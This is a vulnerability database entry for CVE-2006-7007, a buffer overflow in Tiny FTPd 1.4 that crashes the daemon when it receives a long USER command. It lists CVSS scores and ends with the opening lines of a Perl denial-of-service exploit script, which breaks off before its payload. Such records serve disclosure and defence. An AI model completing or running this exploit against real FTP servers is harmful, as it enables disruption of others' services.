7.8
CVSSv2

CVE-2006-7007

Published: 12/02/2007 Updated: 11/10/2017
CVSS v2 Base Score: 7.8 | Impact Score: 6.9 | Exploitability Score: 10
VMScore: 785
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C

Vulnerability Summary

Buffer overflow in Tiny FTPd 1.4 and previous versions allows remote malicious users to cause a denial of service (daemon crash) via a long USER command, a different vector than CVE-2000-0133.

Vulnerable Product Search on Vulmon Subscribe to Product

h. nomura tiny ftpd

Exploits

#!/bin/perl # # Title: TinyFTPD <= 14 USER command DOS # Credits: [Oo] # # use IO::Socket; print "[i] TinyFTPD <= 14 USER command DOS\n"; print "[i] coded by [Oo]\n"; if (@ARGV < 2) { print "\n[*] Usage: tinyftpd_dospl host port\n"; print "[*] Exemple: tinyftpd_dospl 19216801 21\n"; exit; } $ip = $ARGV[0]; $port = $ARGV[ ...